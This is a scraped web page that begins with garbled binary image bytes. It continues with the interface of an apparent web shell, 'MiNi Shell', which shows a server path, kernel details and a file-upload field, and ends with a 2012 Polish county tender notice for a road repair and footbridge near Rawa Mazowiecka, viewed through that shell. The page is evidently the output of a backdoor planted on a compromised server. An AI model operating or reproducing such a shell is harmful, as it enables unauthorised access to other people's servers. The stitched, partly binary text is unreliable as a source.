JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120312/75208-N-2012.html

<p class="kh_header"><b>Rawa Mazowiecka: Remont drogi powiatowej nr 4118E Pukinin - gr.woj.(Mogielnica)
na odcinku od km 13+917 do km 16+363
wraz z budową  kładki dla pieszych nad rzeką  Rokitną  w obrębie remontowanego skrzyżowania z drogą powiatową nr 4122E w miejscowości Sadkowice

w ramach programu  pn: Narodowy Program Przebudowy Dróg Lokalnych - ETAP II Bezpieczeństwo- Dostępność - Rozwój</b><br>
<b>Numer ogłoszenia: 75208 - 2012; data zamieszczenia: 12.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Rawskiego , pl. Wolności 1, 96-200 Rawa Mazowiecka, woj. łódzkie, tel. 046 8144631, faks 046 8144631.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatrawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi powiatowej nr 4118E Pukinin - gr.woj.(Mogielnica)
na odcinku od km 13+917 do km 16+363
wraz z budową  kładki dla pieszych nad rzeką  Rokitną  w obrębie remontowanego skrzyżowania z drogą powiatową nr 4122E w miejscowości Sadkowice

w ramach programu  pn: Narodowy Program Przebudowy Dróg Lokalnych - ETAP II Bezpieczeństwo- Dostępność - Rozwój.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont drogi powiatowej nr 4118E Pukinin - gr.woj.(Mogielnica) na odcinku od km 13+917 do km 16+363 wraz z budową  kładki dla pieszych nad rzeką  Rokitną  w obrębie remontowanego skrzyżowania z drogą powiatową nr 4122E w miejscowości Sadkowice
w ramach programu  pn: Narodowy Program Przebudowy Dróg Lokalnych - ETAP II Bezpieczeństwo- Dostępność - Rozwój.

Obejmuje remont drogi powiatowej drogi powiatowej nr 4118E od km 13+917 do km 16+363   wraz z budową  kładki dla pieszych oraz remont skrzyżowania z drogą nr 4122E  zgodnie z dokumentacją  projektową , w zakresie: 
- remont ubytków   - 150 Mg;
- remont nawierzchni poprzez wykonanie warstwy ścieralnej z betonu asfalt. gr. 5 cm  - 15347,50m2;
- wymiana krawężnika betonowego  - 706,00 m;
- remont chodników - 392,00 m2;
- wykonanie oznakowania poziomego - 84,27 m2;
- wykonanie i wymiana oznakowania pionowego - 40 szt.;
- budowa kładki  dla pieszych o następujących parametrach : dźwigary stalowe NP400 o  dł.12,0m 
  z poprzecznicami,  belki poprzeczne z krawędziaków 12x12cm, belki   podporęczowe stalowe 
  NP100,  pokład   drewniany pojedynczy z bali gr. 7 cm, poręcze z rur  stalowych na słupkach 
  stalowych z NP80 , szerokość  kładki 1,5 m ,  fundament na   pojedynczych studniach d=1000 mm 
  szczegóły konstrukcyjne w projekcie budowlanym,  wraz z chodnikiem łączącym projektowaną 
  kładkę z istniejącymi chodnikami ;  
- ustawienie barieroporęczy mostowych - 16,0 m;
- ustawienie barier ochronnych stalowych  - 14,00 m; 
- uzupełnienie  poboczy    - 4182,00 m2;
- regulacja koron drzew ograniczających skrajnię pionową  - 75 szt.; 
- wymiana lamp ulicznych w obrębie planowanych przejść dla pieszych - 4 szt.;
-  uporządkowanie pasa drogowego po wykonanych robotach;

- wykonanie operatu  inwentaryzacji geodezyjnej powykonawczej wykonanych robót  związanych z 
  budową kładki dla pieszych koszty te  należy  uwzględnić w cenie ofertowej .
  Operat  należy wykonać zgodnie  ze standardami technicznymi  określonymi w rozporządzeniu   
  Ministra Spraw Wewnętrznych i Administracji z dnia 24 marca 1999r.w sprawie standardów 
  technicznych dotyczących geodezji, kartografii oraz krajowego systemu informacji o terenie 
  (Dz.U. Nr 30 poz.297), oraz Rozporządzeniem Ministra  Gospodarki Przestrzennej i Budownictwa  
  z dnia   21 lutego 1995r. w sprawie rodzaju i zakresu opracowań geodezyjno -kartograficznych 
  oraz czynności geodezyjnych   obowiązujących w budownictwie. (Dz.U. Nr 25 poz. 133) wraz z 
  późn. zmianami. Operat  powstały w wyniku niniejszej usługi należy skompletować w oparciu  o  
  instrukcję techniczną  0-1 Ogólne zasady wykonywania prac  geodezyjnych i przekazać do   
  P.O.D.G.K w Starostwie Powiatowym w Rawie Mazowieckiej oraz przekazać 2 egz.
  Zamawiającemu;

- wykonanie i montaż 2 szt. tablic informacyjnych  o min. wym. 60cm x 90cm  informujących o 
  uczestnictwie w Narodowym Programie Przebudowy Dróg Lokalnych - ETAP II Bezpieczeństwo- 
  Dostępność - Rozwój,  koszty te  należy  uwzględnić w cenie ofertowej ;

Materiały z rozbiórki, w tym gruz i zanieczyszczenia oraz nieprzydatny nadmiar gruntu stanowią własność Wykonawcy i winny być usunięte poza teren budowy, przy przestrzeganiu przepisów ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz.U. Nr 62 poz. 628 ze zmianami). Wykonawcę obciążają wszelkie obowiązki i koszty wynikające z przepisów ustawy o odpadach.

Wykonawca robót jest zobowiązany do opracowania projektu organizacji ruchu na czas robót na koszt własny. Wykonawca jest ponadto zobowiązany do wykonania i utrzymania na własny koszt wykonanego oznakowania tymczasowego robót przez cały okres realizacji, a także jego demontażu po robotach i powinien to uwzględnić w cenie ofertowej.

Przed przystąpieniem do robót - w dniu przekazania terenu Wykonawca przedstawi Zamawiającemu zatwierdzony projekt organizacji ruchu na czas prowadzenia  robót ( zgodnie z obowiązującymi przepisami).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7, 45.23.32.22-1, 45.22.11.13-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca jest zobowiązany wnieść wadium w wysokości: 
    20 000,00  PLN, słownie dwadzieścia  tysięcy złotych,  
    w terminie do dnia  28.03.2012r.  godz. 10;oo.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli  Wykonawca wykaże, że  w okresie ostatnich pięciu lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie, wykonał min. 2 roboty budowlane, obejmujące swoim  rodzajem  roboty  budowlane  stanowiące  przedmiot zamówienia, wyszczególniony w kosztorysie ofertowym  oraz  opisie przedmiotu zmówienia  w tym: roboty drogowe związane z wykonaniem  nawierzchni  z masy mineralno-bitumicznej na powierzchni min. 7 000,00 m2 każda   oraz  wykonał min. 2 roboty budowlane  obejmujące realizację obiektów  mostowych  związanych  z  budową/ przebudową / rozbudową  drogowych obiektów inżynierskich w ciągu dróg  publicznych  -  każdy obiekt o wartości nie mniejszej niż.  150 000,00 zł (brutto).
Wraz z załączeniem  dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami  sztuki budowlanej i prawidłowo ukończone ( min. 2 dokumenty).

Zamawiający dopuszcza,  jako spełnienie warunku, wykazanie osobno robót drogowych  (min. 2 roboty)  i  robót obejmujących  realizację obiektów mostowych związanych  z  budową/ przebudową / rozbudową  drogowych obiektów inżynierskich w ciągu dróg  publicznych  (min. 2 roboty) .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli  Wykonawca wykaże, że  dysponuje lub będzie dysponował  sprzętem niezbędnym do wykonania zamówienia tj. (minimalna wymagana liczba jednostek):
- stacjonarna WMB min 100 Mg/h lub zapewnienie dostawy mieszanki min-bitum. z tego  
   typu wytwórni -   szt. 1 ;
- rozkładarka przeznaczona do układania mieszanki z automatycznym sterowaniem i   podgrzewaną  
  deską - szt. 1 ;
- walec ogumiony  - 1 szt;
- walec  stalowy wibracyjny średni - 2 szt;
- zagęszczarka mechaniczna  - 1 szt;
- koparka  - 1 szt;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeśli  Wykonawca wykaże, że  dysponuje lub będzie dysponował  osobami legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem  odpowiednim do funkcji, jakie zostaną im powierzone. W związku z tym Wykonawca przedstawi w ofercie kandydata na stanowisko kierownika budowy do realizacji  zadania objętego niniejszym zamówieniem posiadającego min. 2 lata doświadczenia potwierdzonego  wykazem robót na których pracował :

- kierownika budowy  w specjalności drogowej oraz posiadającego  uprawnienia drogowe lub konstrukcyjno - budowlane w zakresie niezbędnym do wykonania przedmiotu zamówienia lub odpowiadające im ważne uprawnienia, które  zostały wydane  na podstawie wcześniej obowiązujących przepisów w tym zakresie, który pełnił funkcję kierownika budowy lub kierownika robót przy min. 2 robotach budowlanych polegających na budowie, przebudowie, rozbudowie, remoncie  dróg, wraz z informacją o podstawie dysponowania tą osobą;

- kierownika budowy w specjalności mostowej oraz posiadającego uprawnienia mostowe lub konstrukcyjno- budowlane  w zakresie niezbędnym do wykonania przedmiotu zamówienia lub odpowiadające im ważne uprawnienia, które  zostały wydane  na podstawie wcześniej obowiązujących przepisów w tym zakresie. Wykazanie pełnienia funkcji kierownika budowy lub kierownika robót na  zrealizowanych  min. 2 obiektach  na budowę/ przebudowę drogowych obiektów inżynierskich , wraz z informacją o podstawie dysponowania tą osobą.

Zamawiający dopuszcza,  jako spełnienie warunku, wykazanie tej samej osoby do pełnienia  więcej niż jednej funkcji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia umowy będą  mogły zostać zmienione w stosunku do  treści oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli wystąpią  okoliczności  których nie można przewidzieć w chwili zawarcia umowy i będą one  dotyczyć następujących przypadków mających  wpływ na termin wykonania  zamówienia:
1) zdarzeń losowych niezależnych od Stron takich jak np.: strajk, pożar, odcięcie zasilania, 
    brak wody,  trzęsienie ziemi, powódź i inne żywioły,
2) konieczności przeprowadzenia robót, których wykonanie stało się konieczne na skutek sytuacji 
    niemożliwej wcześniej do przewidzenia - wykonania robót  dodatkowych lub konieczności  
    wykonania robót zamiennych,
3) wystąpienia długotrwałych warunków atmosferycznych takich, w których nie można realizować 
   robót ze względów technologicznych, 
4) konieczności pozyskania dodatkowych uzgodnień lub decyzji administracyjnych,
5) powstania potrzeby przeprowadzenia dodatkowych badań lub ekspertyz,
6) zmiany dokumentacji.

2. Termin wykonania zamówienia  może ulec wydłużeniu o okres trwania przeszkody uniemożliwiającej realizację robót, o której mowa w ust. 1. O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie powiadomić pisemnie Zamawiającego, wskazując jednocześnie wraz z uzasadnieniem nowy termin wykonania robót. Zamawiający zatwierdzi lub odrzuci proponowany przez Wykonawcę okres przedłużenia terminu  wykonania robót w terminie
7 dni roboczych od daty otrzymania powiadomienia Wykonawcy. Okres  przedłużenia terminu wykonania robót zostanie potwierdzony przez Strony w aneksie do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatrawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Rawie Mazowieckiej  96-200 Rawa Mazowiecka  Plac Wolności 1 - Wydział Infrastruktury ul.Tomaszowska 8 p. 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2012 godzina 10:00, miejsce: w Starostwie Powiatowym w    
     Rawie Mazowieckiej;   Plac Wolności  1;    pok. Nr 1  Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach programu  pn: Narodowy Program Przebudowy Dróg Lokalnych - ETAP II Bezpieczeństwo- Dostępność - Rozwój.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com